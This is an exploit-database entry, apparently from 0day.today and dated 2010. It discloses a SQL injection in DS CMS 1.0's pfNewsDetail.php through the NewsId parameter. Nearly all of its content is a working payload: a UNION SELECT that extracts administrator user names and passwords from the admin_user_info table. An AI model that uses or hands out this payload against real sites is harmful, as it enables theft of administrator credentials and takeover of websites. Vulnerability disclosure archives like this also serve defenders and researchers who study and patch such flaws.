id: 10560
date: 01/01/2010
title: DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
author: Palyo34
cves: 

======================================================
DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
======================================================

Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
 
 Script site : http://cms.dsinternal.com/Home
 
 AUTHOR      :  Palyo34

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]
 
Example:
 
-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--



#  0day.today [2023-03-24]  #